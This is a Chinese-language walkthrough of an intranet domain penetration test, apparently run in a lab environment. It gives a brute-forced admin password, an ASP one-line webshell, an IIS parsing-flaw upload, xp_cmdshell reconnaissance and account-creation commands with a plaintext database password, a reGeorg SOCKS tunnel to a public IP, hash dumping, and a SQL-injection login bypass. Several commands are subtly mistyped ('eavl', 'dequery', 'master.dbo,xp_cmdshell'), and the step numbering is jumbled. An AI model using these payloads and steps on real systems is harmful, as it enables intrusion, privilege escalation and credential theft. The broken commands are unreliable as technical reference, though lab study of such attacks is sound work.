内网渗透之域环境渗透测试过程

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: 申明:此次渗透环境为实验环境,仅供渗透实验参考

0x01 渗透思路
通过拿到网站shell渗透到内网,由内网存活主机拿到域控权限,再由域控渗透到其他域里面得主机获取资源。

0x02 实验过程
访问目标网站IP发现是一个静态网站,发现网站前台无法利用,尝试爆破一下网站后台

image.png

利用御剑扫描后台没有发现后台登录界面,但发现了robots.txt文件,查看robots.txt发现里面有网站后台目录
image.png

访问网站后台页面

image.png

尝试使用burp暴力破解,发现成功爆破出网站后台管理员账号密码为admin/passw0rd
image.png

利用爆破出来的管理员账号密码成功登录到网站后台(PS:登录的时候选择全功能登录)
image.png

发现在界面风格>模板选择处可以修改模板文件夹名,我们将模板文件夹名修改成1.asp,尝试利用IIS解析漏洞

image.png

然后在界面风格>编辑模板/css文件>添加模板处将aspx一句话木马添加成html文件

image.png

利用菜刀成功连接到我们写入的一句话木马

image.png

利用一句话木马上传一个aspx的大马上去,方便操作

image.png

查看发现该主机是双网卡,得到两个内网IP段
image.png

查看该主机缓存信息发现几个内网IP

image.png

查看发现192.168.152.173开启了1433端口,我们推测其可能是一台数据服务器
image.png

查看网站配置文件发现数据库账号密码
image.png

利用aspx大马成功登录到数据库,并且发现是system权限

image.png

查看域里所有用户名
image.png

查询域组名称
image.png

查看当前域中的计算机列表
image.png

查询域管理员
image.png

利用数据库shell添加一个账号,并将其加入到管理员组
image.png

还发现192.168.152.173开启了3389端口
image.png

利用reGeorg+Proxifier设置代理尝试远程登录
image.png

利用前面我们添加的管理员账号密码成功登录远程桌面,在登录的时候配置选项,将本地工具文件夹挂载到目标机
image.png

成功登录到远程桌面
image.png

利用文件共享上传一个QuarksPwDump.exe,然后使用QuarksPwDump.exe抓取一下系统管理员密码hash并导出到一个txt文件里
image.png

利用MD5发现解不开
image.png

我们知道域里面的主机都是有一定的命名规则的,查看获得shell的网站发现他的网站根目录的命名为game.fbi.gov.us,通过手动测试发现一个域名为oa.fbi.gov.us的网站
image.png

访问我们oa.fbi.gov.us域名发现是一个源码库日志管理系统
image.png

尝试利用asp万能密码绕过登陆,账号:liufeng’ or ‘1’='1密码任意,成功登录到后台
image.png

在添加日志处发现存在存储型xss
image.png

点进我们添加的日志查看一下属性,发现添加的日志的URL
image.png

测试一下得到的URL是否存在注入,发现报500错误
image.png

我们利用啊D注入工具登录到网站后台
image.png

然后尝试注入该URL发现成功注出管理员密码,username不知道什么原因没跑出来,不过问题不大,上面我们已经得到了几个用户名,也不多,可以一个一个尝试
image.png

利用我们前面的到的用户名和密码尝试登录域里面得其他主机
image.png

成功登录到其他主机,然后我们就可以查看下载域里面其他PC端的文件了
image.png
image.png

0x03 总结
1.访问目标网站IP发现是一个静态网站,发现网站前台无法利用,通过御剑目录扫描工具对其目录扫描,发现存在robots.txt,访问robots.txt,存在admin目录2.访问admin目录发现是网站后台页面,虽然后台有验证码,但是验证码超时时间长,可通过bp对其进行爆破,成功爆破出用户名和密码为admin/passw0rd
http://39.106.226.95:9235/admin
3.通过namp扫描目标网站IP,发现系统是windows iis6.0,且开通了80端口
14.发现在界面风格>模板选择处可修改模板文件夹名,模板名修改为1.asp
15.然后在界面风格>编辑模板/css文件>添加模板处添加的模板名1.html,且内容为asp的一句话
<%eavl request("pass")%>
16.通过菜刀成功连接一句话,然后通过菜刀上传ASPX大马上去。
17.通过aspx大马的命令执行,查看网卡IP地址,发现存在2个网卡,一个网卡IP地址192.168.152.182,另外一个网卡为192.168.79.128
cmdpath:
c:\windows\system32\cmd.exe
argument:
/c ipconfig
18.查看该主机缓存信息发现几个内网IP(192.168.152.182,192.168.152.173,192.168.152.180)
cmdpath:
c:\windows\system32\cmd.exe
argument:
/c arp -a
19.利用aspx大马的portscan功能,查看发现192.168.152.173开启了1433和3389端口
20.查看到网站配置文件发现数据库账号密码
21.利用aspx大马的数据库功能成功登录到数据库,并且发现是system权限
connstring:
server=192.168.152.173;UID=sa;PWD=piy88PRO*JNJ24e3;database=master;provider=SQLOLEDB
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'whoami'
22.查询域内所有用户名
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'dequery user'
23.查询域组名称
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'net group /domain'
24.查看当前域中的计算机列表,发现存在web-server,file-server,db-server等主机名
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'net view'
25.查询域管理员,为administrator用户
SQLEXEC: XP_cmdshell_exec
run sql:
Exec master.dbo,xp_cmdshell 'net group "domain admin" /domain'
26.利用数据库shell添加一个账号,并将其加入到管理员组
Exec master.dbo,xp_cmdshell 'net user ddd password#111 /add'
Exec master.dbo,xp_cmdshell 'net localgroup administrators ddd /add'
13.将reGeorgSocksProxy的aspx脚本文件通过aspx大马上传到目标系统中(39.106.226.95),并访问链接
http://39.106.226.95:9235/tunnel.aspx
14.配置好后通过reGeory来打通本地和目标的通道,在攻击机下执行
python reGeorgSocksProxy.py -p 8888 -l 0.0.0.0 -u http://39.106.226.95:9235/tunnel.aspx

15.在proxifier上设置socks4代理,添加代理
socks4 127.0.0.1 8888
16.通过proxifier加载mstsc进行远程桌面登录192.168.152.173,在远程登录的时候配置选项,将本地工具文件夹挂载到目标机

17.利用文件共享上传一个QuarksPwDump.exe,然后使用QuarksPwDump.exe抓取一下系统管理员密码hash并导出到一个txt文件里,发现MD5无法解开
18.在网站根目录下还存在另一个目录为oa.fbi.gov.us。那么直接访问这个目录命令作为网站域名访问,发现是一个源码库日志管理系统
19.尝试利用asp万能密码绕过登陆,账号:admin’ or ‘1’='1密码任意,成功登录到后台
20.发现后台添加日志处又存在存储型xss
21.点进添加的日志查看一下属性,发现添加的日志的URL
http://oa.fbi.gov.us/logive.asp?id=394
22.利用啊D注入工具或者sqlmap工具成功注入出用户名和密码
23.尝试用注入成功的用户名和密码可成功远程桌面登录。

相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
相关文章
|
1月前
|
编解码 安全 Linux
网络空间安全之一个WH的超前沿全栈技术深入学习之路(10-2):保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali——Liinux-Debian:就怕你学成黑客啦!)作者——LJS
保姆级别教会你如何搭建白帽黑客渗透测试系统环境Kali以及常见的报错及对应解决方案、常用Kali功能简便化以及详解如何具体实现
|
2月前
|
存储 监控 网络安全
内网渗透测试基础——敏感数据的防护
内网渗透测试基础——敏感数据的防护
45 2
|
2月前
|
安全 Shell Linux
内网渗透测试基础——Windows PowerShell篇
内网渗透测试基础——Windows PowerShell篇
118 0
|
关系型数据库 MySQL 网络安全
渗透测试——DVWA环境部署
渗透测试——DVWA环境部署
217 0
|
安全 关系型数据库 MySQL
渗透测试——pikachu环境部署
渗透测试——pikachu环境部署
617 0
|
安全 关系型数据库 MySQL
渗透测试——upload-labs环境部署
渗透测试——upload-labs环境部署
1111 0
|
安全 关系型数据库 MySQL
渗透测试——xss-labs环境部署
渗透测试——xss-labs环境部署
508 0
|
Linux 测试技术 开发工具
看我如何打造Android渗透测试环境
本文讲的是看我如何打造Android渗透测试环境,目前世界上有23亿台智能手机,预计到2020年将增长到61亿,到时全球共有73亿人,几乎每人平均有一个智能手机。因为手机可以产生大量关于携用户的个人信息,并且未来也是公司和机构的网络关键切入点,所以这意味着对智能手机的攻击,将会成为黑客的主要攻击对象。
2727 0